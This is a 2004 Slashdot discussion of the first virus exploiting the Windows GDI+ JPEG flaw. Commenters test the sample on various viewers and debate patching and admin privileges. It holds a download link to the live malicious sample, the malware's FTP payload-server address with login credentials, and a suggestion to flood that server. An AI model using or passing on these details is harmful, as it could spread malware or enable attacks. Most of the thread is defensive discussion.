First JPEG Virus Posted To Usenet

Shawn writes "This could possibly be the worst viruses yet! Earlier this month Microsoft announced a problem in their GDI driver that processes the way JPEG images are displayed. Someone has finally posted an exploit to Usenet. Easynews, a premium Usenet provider, found the virus Sunday afternoon. Up-to-date information about how we found it and what it does is located at www.easynews.com/virus.txt. When this picture is viewed it installs remote management software (winvnc and radmin) and will connect to irc."

Anyone have a working copy?

[tuxedobob]

I want to see what GraphicConverter does with this.

Re:Anyone have a working copy?

[JS_RIDDLER]

In the article the virus.txt has a jpeg sample in code.

Re:Anyone have a working copy?

[tuxedobob]

Don't want sample code. Want JPEG.

Re:Anyone have a working copy?

http://easynews.com/test/possiblevirus.jpg.gz

Got the link from bugtraq a few hours ago.

Re:Anyone have a working copy?

[Anonymous+Freak]

Well, Apple's Preview (as of 10.3.5 with all the latest updates as of 6:00 PM PDT, 9/27/04,) says it's not a supported file type.

Graphic Converter complains that "Some parts of the file may be missing."

Safari displays a blank page, with no errors.

In all cases, I can't find any file-system goofiness. (And the free-with-DotMac Virex doesn't detect it as a virus.)

(The offending "virus" is available as a linked-to zip file in the linked virus.txt page.)

Re:Anyone have a working copy?

[Tyrdium]

Heh, Norton Antivirus wouldn't even let me try it. The heuristics grabbed it before it was even on my desktop. Now [i]that[/i] is impressive.

Re:Anyone have a working copy?

[Ariane+6]

I just downloaded the sample from easynews.

Quit all internet apps, and watched my network traffic with Activity Monitor.

Graphic Converter gave its standard "An error occurred while decoding the image. Some parts of the picture may be missing." Message, then displayed a blank white image (555x857)

No spike in network activity at all, as one would expect.

(I love my Mac)

Re:Anyone have a working copy?

[Yaztromo]

I want to see what GraphicConverter does with this.

Absolutely nothing. The file is only 8KB in size, and doesn't appear to contain any actual image data. Loading it up in GraphicConverter v4.9 over here (and Preview, and a number of other tools) just reports that the image file is corrupt.

Yaz.

Re:Anyone have a working copy?

[tuxedobob]

Thanks! Downloaded and opened!

Re:Anyone have a working copy?

[rainman_bc]

Mine too... Totall impressive. What's even more impressive is the ability to use standard html tags on slashdot :)

Re:Anyone have a working copy?

[Three+Headed+Man]

I extracted the bad code, but I'm having trouble getting it to run in WINE.

Just one more reason Linux isn't ready for the desktop.

Re:Anyone have a working copy?

[Ariane+6]

If you think you are safe you are misleading yourself

I am well aware that I am not ENTIRELY safe, however, one of the upsides to using a platform with low marketshare is that the authors of malware (as exemplified by this and the vast majority of other virii) tend to pay it little attention.

Matter of fact, most macs that you can gain local access to are easily rooted through apple tools.

You mean single-user mode? I've used that before. I don't think anyone with local access to my machine gives a shit, though; it's in my bedroom. I suppose that if a cracker is enterprising enough to break into my house and root my machine locally, well...fair play to them :)

Re:Anyone have a working copy?

[Ravadill]

As of writing the latest clamAV (windows ver) with latest virus DB does NOT find this.

Re:Anyone have a working copy?

[boisepunk]

GIMP under Win32 gives error "Improper call to JPEG library in state 201".

I'm not going to try it under internet exploiter or mspaint. ...just trying to be informative

Re:Anyone have a working copy?

[HermanAB]

Yah, Linux is boring - it just works...

Windows Users have all the fun!

Re:Anyone have a working copy?

[tonyr60]

"I don't think anyone with local access to my machine gives a shit, though; it's in my bedroom. I suppose that if a cracker is enterprising enough to break into my house and root my machine locally, well...fair play to them :)"

Hey, come on. Root my wife, partner or whatever. No problem there. But definitely not my machine, particularly in my bedroom....

Re:Anyone have a working copy?

[Paul+d'Aoust]

In all seriousness, I downloaded an example of an Evil JPEG to my Linux computer and tried opening it up in various programs.

• Eye of Gnome seemed to work okay, but I got all sorts of weird redraw problems when I tried to resize the window.
• Gimp (2.1) says the JPEG is unsupported and couldn't be imported by the filter, then segfaults.
• Konqueror seems to work okay, but just shows a tall black rectangle, and its spinner is still chugging away, as if it's still busy loading something.
• Firefox 0.9.3 has no troubles at all; it just shows a nice white rectangle on a white background

So, after five minutes of extremely unprofessional research and wild conjectures, I'd say it looks like the stories are true: some Linux programs may be vulnerable too. Yikes!

mind you, who would ever write an exploit that would only spread to five percent of the computers in the world? ;-)

Re:Anyone have a working copy?

[Gogo+Dodo]

Did NAV detect it as Bloodhound.Exploit.13?

What I find interesting is the next one in sequence, Bloodhound.Exploit.14. Looks like IE has problems parsing TIFFs, too. First time I've heard of this. Apparently, Microsoft hasn't acknowledged this one as there's no link on the Symantec site for further details like they do will all the previous ones in the Bloodhound.Exploit series.

Re:Anyone have a working copy?

[Jussi+K.+Kojootti]

TIFF supports using different compressions including jpeg (not all programs accept unusual choices though). That could be the reason.

Re:Anyone have a working copy?

Yeah but Linux users make up 90% of the porn-downloading population; therefore, there is an elevated risk.

Re:Anyone have a working copy?

[Gogo+Dodo]

I found this on SecurityFocus: Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability. Looks like Symantec is proactive, but then that is what their Bloodhound stuff is for.

Re:Anyone have a working copy?

[famebait]

So, after five minutes of extremely unprofessional research and wild conjectures, I'd say it looks like the stories are true: some Linux programs may be vulnerable too. Yikes!

I don't know much of Linux internals, but I don't think it is obvious that it is vulnerable just because programs can get confused by unexpected data.

UNIX generally has separate code and data segments, and with modern CPUs with memory management the OS should be able to enforce the separation very strictly. Doesn't Linux do this?

It has long been a mystery to me why Windows did not (up until XP SP2). Whole classes of overflow exploits and system threats from bugs are just not be possible if you can't execute code that's not explicitly loaded into executable segments, and if normal data-writes simply don't have write access to executable memory.

Re:Anyone have a working copy?

Thing is, without NX x86 processors have no way of marking pages as non-executable. Not even on linux.

Re:Anyone have a working copy?

[ajs]

I don't know much of Linux internals, but I don't think it is obvious that it is vulnerable just because programs can get confused by unexpected data.

Simple answer: no, and that's why buffer overflow attacks work.

Yeah, I've been waiting for years to hear about the first image-based attacks for Linux. I was kind of surprised that the first exploits arrived for Windows instead of Linux, just because we've known about several holes in Linux over the years (look at the changelog for any image processing library). The down-side is that you can't always "root the box" based on an image attack because a user will be running the browser, but I would think that access to the machine is enough for most zombification and you can always go after local exploits to get root at that point.

Linux needs a good suite of exploitive data (that doesn't do anything) for projects to test against. Perhaps I'll work on that in my spare time (every format and protocol has many spots where it would be easy for a lazy programmer to do static allocation and then fail to bounds-checks, so you just write code/generate data that exploits each one of these places. I've done this for specific proprietary applications before.

Re:Anyone have a working copy?

[marklark]

Hmmm... Perhaps you need to update your Virex.

Mine, v7.5, did find it and offer to clean it.

$0.02

Re:Anyone have a working copy?

[The_ForeignEye]

He was not joking. ...and don't call him surely.

Goatse

[paughsw]

One more reason not to look at that goatse picture!

Re:Goatse

[Molina+the+Bofh]

It'll leave your backdoor wide open.

Re:Goatse

[devilspgd]

If the editors can dupe, why not the posters?

Re:Goatse

[NanoGator]

...If the editors can dupe, why not the posters?

That's pretty amazing.

[autopr0n]

Congrats, microsoft, for making just about every filetype unsafe.

The worst part is that you don't even need to be using IE. Hopefully mozilla decodes the jpgs itself before rendering them on windows.

Re:That's pretty amazing.

[FooAtWFU]

Any recent version certainly does so.

Re:That's pretty amazing.

[mini+me]

Hopefully mozilla decodes the jpgs itself before rendering them on windows.

It does. But Mozilla had almost the exact same problem with both BMP and PNG in the last week or two. So it's not just Microsoft who has vulnerable image decoders.

Re:That's pretty amazing.

[ConceptJunkie]

This reminds me of my first thought when I saw Windows 95 message "It is now safe to turn off your computer."

Which was, "However it is no longer safe to turn on your computer."

Quality freefall.

Really, how much new useful functionality has MS provided in the last 5 years? It takes just as long to load apps now as it did 10 years ago, even though machines are 10 times faster with 100 times more memory. Functionality increases at best in a linear fashion, while system requirements increase at a geometric rate. Software eats more of your computer and offers less in return.

Remember when MS supposedly shut down for a month to work on security issues? That was about 4 years ago. Not only did the problems not go away, but the occurance of gaping new exploits increased significantly.

Maybe they should shut down for a year. Take all the gigabyte-gobbling shit they've written for the last 10 years and turn it into useful code with no new functionality. Returning with the same stuff they have now, but with little or no security issues would win them more customers than their current monopolistic policies and FUD spreading ever will.

Really, what else could they possibly do besides introduce a bunch of bloated new technologies for doing the same damn thing we all wrote for ourselves years ago, but without all the MS lock in and huge learning curve?

I have to ask, what has MS done that is actually useful since Windows 2000?

Re:That's pretty amazing.

[datawar]

Are you serious? Of course Slashdot covered those stories too.

Critical Mozilla, Thunderbird Vulnerabilities

CERT Warns Of Multiple Vulnerabilities In Libpng

Re:That's pretty amazing.

[craXORjack]

It takes just as long to load apps now as it did 10 years ago, even though machines are 10 times faster with 100 times more memory.

I'm glad I'm not the only one who noticed this. btw cpu's are way faster than 10x faster. In 1994 I could only afford a 386sx at 16Mhz. Not only is the clock speed faster but the chip has gone through several major revisions. Yet I think that 386sx booted up faster and ran Lotus and Wordperfect under DOS just as fast as anything out there on Windows today. Of course there are some advantages to windows but speed sure isn't one of them!

Re:That's pretty amazing.

[joelanders]

I always thought I could avoid viruses by looking at pr0n instead of....

Re:That's pretty amazing.

[ConceptJunkie]

The real kicker was when I switched to Outlook 2003 from Outlook Express. From a usability point of view, it was a pretty good improvement, especially the spam handling, but with a fairly large message store, it took at least an order of magnitude longer to access folders, etc, in O2k3 than OE. It was absurd. Oh, yeah, and the fact that an O2k3 data store can't be bigger than about 1GB to 1.5GB before it starts losing messages (I couldn't believe this at first but it was confirmed by two people with much more MS experience than me). I switched to Thunderbird around 0.5 and haven't given it a second thought.

Now here's a case where the MS software really was well-designed and easy to use (from a UI standpoint), but the grotesque slowness of the app killed it for me.

In 1994, I had a 50MHz 486SX... I didn't buy a Pentium 100 until '96, so you're right. Clock speed is more like 40 - 60 times faster (and thanks to wonders of CISC, performance is more than that). And disk space has increased for me by 3 orders of magnitude.

I seem to recall MicroCenter or CompUSA having a "Buck-a-Meg" sale and I bought a 340MB drive for $340, bringing my total to a whopping 580MB. Now I've got about 600GB over about 4 machines, maybe more since each box is crammed full of old drives ranging from 7GB to 250GB etc in addition to a few bigger drives.

I used to hate how my Amiga took like 3 minutes to boot back in the late 80's. Windows 2000 on a machine that was 100 times faster took around the same time. XP is much better, but still, there are times when I have a lot of apps loaded and it just seems to go out to lunch for several seconds before anything responds. And don't get me started on the launch time for Word 2003...

Re:That's pretty amazing.

[madmancarman]

I have to ask, what has MS done that is actually useful since Windows 2000?

They killed Clippy.

Re:That's pretty amazing.

[Doyle]

I have to ask, what has MS done that is actually useful since Windows 2000?

You mean, apart from the sanitation, the medicine, education, wine, public order, irrigation, roads, a fresh water system, and public health?

Oh, wait - that was the Romans :P

Re:That's pretty amazing.

[HermanAB]

No dammit, if MS fix their code it will kill the PC support industry and another million wannabe geeks will be out of work...

Re:That's pretty amazing.

[ConceptJunkie]

What has Open Source done in the last 4 years?

Gone from Linux 2.0 to Linux 2.4 with all the huge improvements that go with it.

Built a world-class browser from scratch. Ditto for e-mail.

Developed half the apps I use under Windows.

(And while I like the Windows development platform, ironically, I still use VC++ 6 because that's what all my clients use and want.)

: What have other large companies done in the past 4 years?

Sun: Got in a pissing match with MS over Java. Won, or lost... heck I don't even know (or care).

Oracle: Continues to resent losing a competitive pissing match with MS despite having a superior product

Corel: Tried to enter a pissing match with MS with 1/100th of the resources... failed miserably and sold everything

Apple: Continued their pissing match with MS over usability (and is still losing the war despite winning all the battles)

IBM: Set themselves up for a pissing match with MS by backing Linux.

SCO: Pissed off everyone.

Enron: Pissed on everyone.

Novell: Pissed themselves.

Re:That's pretty amazing.

Known vulnerabilities in Mozilla.

These would be numbers 83 and 89 on that list.

Re:That's pretty amazing.

[NanoGator]

"I have to ask, what has MS done that is actually useful since Windows 2000?"

The image viewer that comes with XP is very nice. (Especially for us pr0n freaks.) You can log in as another user without logging out the previous user. (We use that at work fairly frequently.) CD burning is built in to explorer. Startup and shutdown are considerably faster. You can actually lock the taskbar, although MS should have added that when they first put it in. I've noticed fewer restarts after installing some stuff, but it's been a long time since I've done that so I can't be more specific. Etc etc etc.

To sum it up: I have a 2k workstation at home and an XP workstation at work, and boy do I feel the dfference. I can still do my work just fine on 2K (i.e. I'm not excatly running out and buying the upgrade) but I am glad I have it at work and on my laptop. XP isn't total garbage compared to 2K.

Re:That's pretty amazing.

[IchBinEinPenguin]

Returning with the same stuff they have now, but with little or no security issues

Sorry, that won't work.

Some of the stuff is insecure by design!. Not "designed to be insecure", just "impossible to secure given the design".

Take ActiveX: running binary code downloaded from a anywhere without a JVM-like sandbox is insecure. Not matter how many digital signatures, OK dialog boxes and warnig messages you add, some (most?) users WILL simply click through all the warnings and have their boxes 0wn3d.

Design has tradeoffs between security, performance, usability etc. etc. Some of this stuff you can't fix without changing the basic design (i.e. starting from scratch)

Re:That's pretty amazing.

[bitflip]

Apparently, the Outlook interface was useful enough that Evolution 2.0 copied it.

Re:That's pretty amazing.

[Tony-A]

"It is now safe to turn off your computer." ... Quality freefall.

It's related.
There is an arrogance that Microsoft knows best that is implicit in that statement. Whether or not it is actually safe to turn off the computer is very much outside of Microsoft's knowledge. In fact the safest thing to do when a system is acting bonkers is to hit reset or the power switch on old computers or pulling the power plug or removing the battery on new compouter where the power switch is no longer functional. The reasoning goes that when the system has its brains scrambled it desperately wants to write those scrambled brains to disk and thus perpetuate the scramble.

Remember when MS supposedly shut down for a month to work on security issues? That was about 4 years ago. Not only did the problems not go away, but the occurance of gaping new exploits increased significantly.

One whole month, Well golly gee! Actually one month would be enough to stop hiding stuff and never under any circumstance use or require scripts or ActiveX controls for anything remotely related to security.
[x] Hide files extension for known file types.
That by itself is enough to wreck any attempts at achieving security. The message is loud and clear. Linux worms never seem to get anywhere. People see them and react violently to anything sneaking around trying to be invisible.

Task Manager doesn't show everything. Microsoft Windows comes with a pre-installed root kit!

Re:That's pretty amazing.

[spectrokid]

Hey, they even managed to make vCard unsafe at one point, and that is a fucking TEXT file!!!

Re:That's pretty amazing.

[spectecjr]

From a usability point of view, it was a pretty good improvement, especially the spam handling, but with a fairly large message store, it took at least an order of magnitude longer to access folders, etc, in O2k3 than OE.

The first time you open the folder, it takes time to index it. After it completes indexing, it's much faster. If you don't allow the system to complete indexing before navigating away from a folder, it'll need to do it again next time you open the folder.

If you don't want to take the time, instead of opening existing PST files in Outlook, create a new one and import the contents of the older one into it - which will do the indexing for you.

After it has finished indexing, it's as fast - or sometimes even faster - as previous versions.

Re:That's pretty amazing.

[mlush]

It takes just as long to load apps now as it did 10 years ago, even though machines are 10 times faster with 100 times more memory

Thats Gates Law: Every 18 months the speed of software halfs.

Re:That's pretty amazing.

[MikeDX]

Winxp is chugging down at least a gig and a half, and really doesn't offer me much more than nt4 did.

What?? Are you trying to tell us that the nice rounded safe buttons, pretty green wallpaper and network killing security issues arent worth the $150 price tag?? Surely you jest!
To me, when I think Microsoft, I think "Small Software", ah, so much for so little, what a happy family we are!

Just begging to be sued

[TheSpoom]

printf(" | JpegOfDeath - Remote GDI+ JPEG Remote Exploit |\n");
printf(" | Exploit by John Bissell A.K.A. HighT1mes |\n");
printf(" | September, 23, 2004 |\n");

Geez, this guy really wants to be sued and/or arrested.

Re:Just begging to be sued

[Anonymous+Freak]

This is the guy who published the "proof of concept" exploit, not the virus that is in the wild. He is as likely to be sued as "DVD Jon" would be sued for breaking CSS. Oh, wait.....

Re:Just begging to be sued

[d_jedi]

I got my lawyer on the phone, but he couldn't look up any legal info.. seems he was viewing some p[r]on, and all of the sudden, his computer stopped working..

Damn Jay Peg with his viruses..

Re:Just begging to be sued

[lukewarmfusion]

"Can't arrest someone for merely writing a piece of code."

coughcoughpatriotactcoughcough

Re:Just begging to be sued

[BiggerIsBetter]

...in JAPAN! But in the US, you probably can be.

Re:Just begging to be sued

[thogard]

So is Billy G an ass for giving the script kiddies something easy to use too?

Re:Just begging to be sued

[toetagger1]

Google finds a whole lot of exploids for this guy. Ranging from apache to AIM away message buffer over runs.

Can be prevented...

[pbranes]

Update your systems now! The patch has been out for several weeks. I have already applied it to my corporation via SUS (which is free) and am rolling out the office patch now, as well. There is no reason other than laziness or sysadmin ignorance for this to be another massive virus attack.

Re:Can be prevented...

[Zocalo]

Yes it has. Unfortunately like many Microsoft patches it gives you a nice fuzzy sense of false security. According to Microsoft, I'm nice and safe, but according to Tom Liston's GDIScanner and a quick perusal of the file versions, I'm quite possibly not. Fortunately my virusscanner *does* seem to pick up on this, but that's no thanks to Microsoft.

Re:Can be prevented...

[antifoidulus]

SUSE is also free, and will solve the problem....:P
Sorry, couldn't resist that one.

Re:Can be prevented...

[Saratoga+C++]

Sorry to burst your bubble dude, but that patch only fixed the system's instance of GDI+ There are a ton of apps that have their own version of GDI+ built on their own app path. just because you use the patch that doesn't mean that its actually fixed.

Say your using app X that uses GDI+ to render its own image stuff (say its a picture album maker). It keeps its own version of GDI+ that the developers extended for their own reasons. This GDI+ is vonerable. After patching this older version of GDI+ is still on your system so that app is vonerable...

So buyer beware.

Re:Can be prevented...

[EnronHaliburton2004]

Since this virus also affects MS Office, I bet it may be propogated that way.

Most people update their system via windowsupdate.microsoft.com . However, despite the rumors, Windowsupdate does NOT update your MS Office suite.

Very few people go the extrastep to use the MS office updater.

Re:Can be prevented...

[glob]

> Sorry to burst your bubble dude, but that patch
> only fixed the system's instance of GDI+

while we're bursting bubbles, the patch from microsoft contains a tool that scans your hard disk for all vulnerable gdi dlls.

Re:Can be prevented...

[dabug]

From Tom Liston's site:

"Ignore files in directories like Windows\$NtUniinstallKBxxxxx\ and Windows\WinSxS. These are old versions left behind for uninstal purposes."

Re:Can be prevented...

while we're bursting bubbles, the patch from microsoft contains a tool that scans your hard disk for all vulnerable gdi dlls.

Another bubble bites the dust! It detects, but does not fix the problem. Nor does it even tell you where the problem is. This was covered earlier today.

Re:Can be prevented...

[stemcell]

Say your using app X that uses GDI+ to render its

Oh no, not X too.

Stem

Re:Can be prevented...

[Zocalo]

Not strictly true. "WinSxS" is short for "Windows Side-by-Side" which according to my research over the last few days is a horrible hack to try and allow different apps to use different versions of the same DLL on the same system. So, suppose we have three versions of the DLL; v1 and v2 are vulnerable, v3 is not. Windows comes with v2, but I install a graphics viewer that requires and installs v1 as part of its install - v1 goes into "WinSxS". When I install the MS patch, the vulnerable v2 version is replaced with the secure v3 and MS tells me all is well, but if I open a bad JPEG with my graphics viewer, it loads the v1 DLL and my PC belongs to someone else.

A new era of exploitation

[SlashdotMirrorer]

This sort of thing ushers in a new era of exploitation in which the warnings of security professionals in the past have been proven dreadfully wrong. Only the bearded terminal hackers are invulnerable to this one, typing away at their command lines being all, "What JPGS?". No longer can we simply give advice on security based on our assumptions as to what is possible and what is not. We must pay the piper and actually consider attack vectors that have formerly not been feasible.

The real question...

[comwiz56]

Does this affect Firefox?

Well...

[Pantero+Blanco]

It was only a matter of time. Now we wait for a dozen variants to pop up.

"This could possibly be the worst viruses yet!"

Hm...maybe when he started typing there was only one and it spread during the sentence?

Nothing's safe anymore

[phantomAI]

I guess those nude pictures of Anna Kournikova could indeed be a virus.

Re:Nothing's safe anymore

[bergeron76]

So does this qualify it as a Sexually Transmitted Disease (STD)?!?

Drat!!!

Fantastic

[lukewarmfusion]

Virus writers should be dragged out in the street and... well, whatever.

The only reason we need security for this crap is because the viruses exist. Which means that we only have security when the need arises. If the vulnerability exists but is never exploited, it tends to sit open and unpatched. As soon as this pops up, we see vendors frantically patching systems.

I usually call it like I see it - which means defending the bad guys when they deserve it. But in this case, there's no doubt that open source has major advantages. The vulnerability has been identified, people are complaining that it's not being fixed... I bet it takes a virus to get MS (and others) moving to fix it.

Re:Fantastic

[Nurgled]

This latest valnerability is more like having an adequate lock but a burgular coming in through a valnerability in your couch. No-one considered the security implementations of the couch, because no-one expected the couch to be a point of entry.

I don't see why this is a problem

[bconway]

If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.

Re:I don't see why this is a problem

[gl4ss]

why it's a problem? because people do run with admin priviledges.

I hate to break it to you but normal people don't know or care about things like that.
.

Re:I don't see why this is a problem

[rufo]

Yeah, that's all well and good - except for the fact that Windows sets up users by default as administrators, as does every OEM to ship a Windows PC, and without any explanation as to why this is or why it might just be a bad idea.

Until Microsoft stops shipping the OS wide-open for anyone to do anything they want, these kind of attacks will continue. Apple's gotten it much more right in this regard - even as a Mac user I don't think Mac OS X is particularly more secure then any other *nix or even Windows (just less analyzed), but at least Apple doesn't ship with any services turned on or allow admin users willy-nilly access over the entire system (most admin settings and files require password confirmation before continuing - not foolproof by any means but a huge step in the right direction), as do most good Unices these days.

But of course not Windows. ;-)

Re:I don't see why this is a problem

[real_smiff]

she must have had Admin access to make herself an admin, no?

i manage systems with limited user accounts perfectly fine. just about all software works aswell, office apps, multimedia, games, communications - it's not as bad as people make out. stuff that doesn't work - people don't get to play! (evil grin ;) also be sure to complain to the makers, it's the only way to improve this.

Re:I don't see why this is a problem

[Etcetera]

At the risk of being kicked off Slashdot for being a devil's advocate... ;)

If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.

Why shouldn't I be able to run as an administrator on my own machine? It's my computer... I paid for it... I'm the only one using it. If the system is insecure, isn't that the system's fault? Am I to be blamed for operating my computer in a fashion that (*gasp*) allows me to make changes to it when I want without it bitching to me any further?

Think bigger. Think to the future. "Don't log in as root/Don't be an administrator." is NOT an answer. Mac OS 9 and below operated by default in a single-user mode without *any* authentication necessary to make changes and I can list the successful viruses/exploits (especially remote exploits) by hand on a single sheet of paper.

Artificial permission models (where "artificial" means "not needed by the environment") are not panaceas and aren't excuses for poor OS design.

Re:I don't see why this is a problem

[real_smiff]

interesting post, but: a lot of the reason to run a system with limited accounts is to prevent certain *users* doing things *you* don't want. not things that are 'definately wrong', like installing viruses, just things you don't want in your organisation. how is your better security modal/OS design ever going to prevent that? i guess on a single user system what you're saying could make good sense?

Re:I don't see why this is a problem

[Waffle+Iron]

If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.

It can still do anything the user can do, including installing itself in the user's account space, setting itself to run every time the user logs on, uploading all of the files the user can access, logging the user's keystrokes, sending email, pinging for other systems, etc. Running as a non-administrator is not a panacea.

Re:I don't see why this is a problem

[HuguesT]

All well and good but many things don't work in windows if you are not an administrator.

I find it incredible that reputable developers like ID software for example require the latest demo of Doom 3 to be *installed* AND *run* as an administrator. The demo readme states this explicitely.

Yes I do know about "Run As" but what are these people thinking? Administrator is for administrative tasks, not for playing games.

No wonder XP is such a debacle area security wise.

Re:I don't see why this is a problem

[JoeBuck]

We generally run Linux in my house, but my six year old daughter has a couple of computer games, and one of our machines is dual-boot; pretty much all that that copy of Windows is used for is her games. Guess what? The games only work if I make my six year old an administrator. The reason is that the games were written in the Windows 95 era; they want to do direct access to everything, and that takes privileges that a non-admin Windows XP user does not have.

This kind of thing is common, and it forces a lot of people to run with elevated privilege. This is the price of legacy. Of course, Microsoft could have provided some mechanism to run the older programs without privilege (say, with some kind of virtual machine setup), but they probably figured that if they didn't do the work, it would be easier to sell new XP versions of all the apps.

Re:I don't see why this is a problem

[jpop32]

We generally run Linux in my house, but my six year old daughter has a couple of computer games, and one of our machines is dual-boot; pretty much all that that copy of Windows is used for is her games. Guess what? The games only work if I make my six year old an administrator.

As a producer of children computer games, I have encountered those problems. Most are solved by a couple of registry/security policy edits. Try enabling 'Restrict CD-ROM Access to locally logged-on user only' in Local Security Policy (found in administrative tools). That should cure a lot of them.

Careful assignment of permissions to ceratin files/directories would probably take care of others. Check out www.sysinternals.com for tools which can help you track down what the program is trying to open and what it fails to do.

Re:I don't see why this is a problem

[Nurgled]

Much like on a Linux system, a limited user can just shove executables in his or her "home directory" and run them from there. The main thing making this hard right now is that it's very hard to get most applications not wrapped in an "installer" which tries to write DLLs all over the filesystem regardless of what directory you choose to install.

Windows XP "logo-compliant" installers will offer admin users the choice to install for "All Users" (put it in a publically-readable directory) or "Just Me", in which case much of it should end up in the admin's home directory. Limited users can install for "Just Me" only. This is much like me downloading a source tarball on a UNIX system and running ./configure --prefix=/home/nurgled/appdir.

Re:I don't see why this is a problem

[CheechBG]

I don't know about you, but I don't want to have to use the Run As command every 15 minutes just to do something simple like burn a CD (need Admin privs) or run a game. This is my PC, I administrate it, so I run with Admin privledges. As such, it then becomes MY responsibility to make sure that bullshit stuff doesn't find it's way over. This is why I bother to run an AV program, have Spybot tell me whenever something is trying to write to the registry, and so on.

At work, however, is a different story. I do have domain access, but I never log in as the domain admin unless I need to do some administration. I did, however, grant myself local admin rights on my machine for the same reasons above. I don't have a problem with spyware, adware, viruses, or anything.

Re:I don't see why this is a problem

[jermz]

Why shouldn't I be able to run as an administrator on my own machine? It's my computer... I paid for it... I'm the only one using it. If the system is insecure, isn't that the system's fault? Am I to be blamed for operating my computer in a fashion that (*gasp*) allows me to make changes to it when I want without it bitching to me any further?

This is a bad attitude to take. You might be the only user on your machine now, but when you allow a trojan on that downloads and installs remote-control software on your computer, you are not the only user anymore. In the current state of the Internet, you are being irresponsible if you think you are the only one using your computer. It sucks, yes, but it's the truth.

It's like the old saying about VD. Once you sleep with someone, it's like sleeping with everyone they have slept with, ad infinitum. If you do not take the steps to protect your computer, you are not only exposing yourself to the dangers of the Internet, but your machine can then become a vector itself. Think about that.

BTW, greets from another rohan user. I went to SDSU back in '94. rohan was the first Unix box I ever had an account on. Lots of fond memories there.

Jeremy

clamav and nav detect it

[Indy1]

clamscan possibleVirus.jpg
possibleVirus.jpg: Exploit.JPEG.Comment FOUND

----------- SCAN SUMMARY -----------
Known viruses: 24607
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.00 MB
I/O buffer size: 131072 bytes
Time: 0.501 sec (0 m 0 s)

also updated nav corp 8 with latest defs (9/27/04) and it found it. AVG free edition doesnt as of yet.

Imagine for a moment....

[Hardwyred]

your neighbors open accesspoint, a copy of Airpwn and a suitably infected jpeg. Sounds like a pretty nasty situation in the making to me.

Screenshots...

[tajmorton]

No Screenshots, please!

Re:Hello

[borl]

No, just a backdoor.

alt.binaries.erotica.beanie-babies

[drachenfyre]

Ok, no offense, but beanie-babies and erotica? There are some newsgroups that just shouldn't exist.

Re:alt.binaries.erotica.beanie-babies

I take offence at your narrow-mindedness.

Re:alt.binaries.erotica.beanie-babies

[marko123]

Were you around during the height of the popularity of alt.tasteless.hamster.duct_tape or alt.swedish.chef.bork.bork.bork?

Those were the days. Anyone go to Level 17 on gopher?

Eek!

[StevenHenderson]

This could possibly be the worst viruses yet!

These could be the worst grammar too!!!

Not particularly well coded

[crazyray]

If you read through the actual posting, it is apparent that this while may be the first GDI/JPEG-based worm, but it is certainly not going to be the worst. First of all, unless I missed it- this code does not even self-replicate (i.e.- it doesnt mail itself to others, or post itself to usenet, or otherwise exploit vulnerable systems) I would expect to see some script kiddies combine this proof of concept trojan with some social engineering type email worms, and then t**THAT** will be a nasty worm.

Re:Not particularly well coded

[Leomania]

Considering how many people are affected by malware loaded by visiting/loading code from a malicious (or hacked) website, I would expect this to spread relatively quickly once the exploit is propagated around all over the net.

I saw one post indicating that the anti-virus tools can pick it up, but can they do so when you visit a website? My guess is no, and as such the majority of people who don't update their systems regularly (most people) have a pretty high likelihood of coming across such a site sooner rather than later as a result.

- Leo

Re:Not particularly well coded

[djeca]

Just had a nasty thought... the latest round of IM programs have user-settable "buddy icons" which IIRC can be JPEGs. A worm that used buddy icons to spread could have half the internet infected in 15 minutes, and do it via existing social networks. I hope the MSN and AIM servers are scanning buddy icons to prevent this being used...

The answer is...

[Leomania]

yes, if you haven't updated to the latest version.

See this Slashdot thread.

- Leo

Re:The answer is...

[Leomania]

Sorry, that should be "yes to a similar vulnerability, but not to this exact one, unless you've upgraded to the newest version."

Must hit "Preview" to check those links, not "Submit"...

- Leo

Even more evil ...

[gregoryl]

put the image on doubleclick.net

Re:Even more evil ...

[TCM]

^(.*\.)?doubleclick\.(com|net)$

is blocked here anyway..

WAV files

[mosel-saar-ruwer]

Last weekend, I was messing around with writing my own WAV files [in conjunction with a LabVIEW project], and, oddly enough, M$FT's wmplayer.exe was the ONLY media player that checked the file for integrity.

Real Player and that piece of crap spyware that Dell calls a media player just blithely tried to open the file without performing any integrity checks whatsoever, and damn near crashed the system.

I bet this sort of thing is a helluva lot more endemic than people realize.

DOS it now?

[real_smiff]

it connects to ftp://209.171.43.27/www/system/ u/p bawz/pagdba

apparently, the text indicates, that's the only source for the installed files.

if say, 500 of us were to log into that and stay connected, would we stop the virus? would there be any risk to ourselves? (giving your IP away for a start).

The joys of keeping a campus virus-free

[iamlucky13]

Our university campus has a huge problem with viruses and this is another exciting addition to our collection. I'm sure I'll start seeing on plenty of guy's asking for help getting this removed, after finding out pornstars aren't virus free after all.

Thankfully, though, this shouldn't cause as much trouble as our current crop of worms. I'm shocked at how dumb our users are, as a whole. We're still having people infected with blaster, over a year after Microsoft patched that vulnerability! Sasser is absolutely rampant. The school even purchased a blanket liscence of Norton, but I would bet less than half of the students have installed it. We have a T3 line providing our outside connection, and it's currently averaging about 7 Mbps combined up/down, because the internal network, which is mostly linked from buidling to building by gigabit fiber, is saturated by virus crap. Although this virus may have a really effective way of spreading, it scares me very little.

Re:The joys of keeping a campus virus-free

[pigscanfly.ca]

I know what you mean . I'm an RCC (resnet computer consultant) at waterloo and we provided everyone with simple step by step guides to install norton and turn there firewall on yet we disconnected over 10% of people for getting infected with a form which the default windows firewall stops.
Add to our luck that norton doesnt detect the worm and we have a computing experience which reminds people of the old BBs days.
Lets just say I dont were my nametag except when required to :-)

Re:The joys of keeping a campus virus-free

[Agilis]

The campus Resnet I'm on right now is just as bad if not worse, and we're sitting on an OC-3 here (though it's only 10Mbp and what seems to be Cat3 to most dorms. Yes, you heard me - we need special cables that take are RJ-11 on one end and RJ-45 on the other)

Once 3 years ago as a freshman, I left my XP share open to those default Shared folders for 10 minutes and had about 30-50 copies of nimda flood in. Norton went berserk with warnings before I closed the sharing.

And 2 years ago the fiber switches literally got overloaded from traffic from sasser et al. It still happens time to time. It's a wonder we've got continuous conntections more than a few hours.

